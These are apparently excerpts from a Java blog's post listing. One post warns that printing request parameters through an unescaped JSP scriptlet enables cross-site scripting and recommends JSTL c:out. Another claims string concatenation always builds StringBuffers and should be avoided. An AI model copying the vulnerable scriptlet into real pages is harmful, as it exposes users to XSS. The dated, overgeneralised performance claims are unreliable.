MANAGMENT

JSTL is very common word across web developer who work on dynamic content display in JSP page creation. It may be common practice now a days but thought it would worth sharing this information. This information will be helpful... Lots of developer use normal scriptlet to print dynamic values from user in JSP. e.g. String langId = request.getParameter("langId"); <%=langId %>      This might be fast way to do the coding but not the safest way. This approach will make your website vulnerable to security threats like Cross Site Scripting. And can be easily used by malicious user to do some fishing in your website. Malicious User's can use this loop hole to redirect to some fishing website and capture critical user data. To address this issue there are many approaches available but one of the better and simpler approach is to use JSTL tags. These tags takes care of these above mentioned issues on its own. No additional coding is required. If you use <c:out value=...

Thinking java String concatenation internally uses StringBuffer to do the concatenation operation, we do concatenation as mentioned below in java code, String str=a+b; a and b is string objects. java compiler compiles above code in this fashion: String str=(new StringBuffer()).append(a).append(b).toString());     Above code creates two objects, and as you must be knowing that java maintains the string data in char array which is also an object so it creates 1 more object. So in total 3 objects gets created for one concatenation operation. Please note that object creation is one of the costliest operation in java.     I created one test program just to see the performance difference and results were dramatic... i ran both loop in same program 1 million times. See the time difference... So based on below result its  recommended to use StringBuffer.append whenever you are doing any concatenation operation in java...     time taken ...